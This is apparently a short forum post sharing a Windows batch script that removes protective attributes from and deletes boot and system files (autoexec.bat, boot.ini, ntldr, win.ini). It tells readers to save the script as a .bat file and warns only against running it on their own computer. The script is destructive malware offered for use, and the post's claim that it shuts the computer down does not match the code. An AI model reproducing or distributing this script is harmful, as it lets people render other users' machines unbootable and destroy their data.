02-10-2020, 05:07 AM
| 0 | 0 | ||
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Now save this as (anything).bat .
Please don't double click this file in your computer.
This file shut down the computer. It shuts the computer off and deletes the files required to reboot and restart.













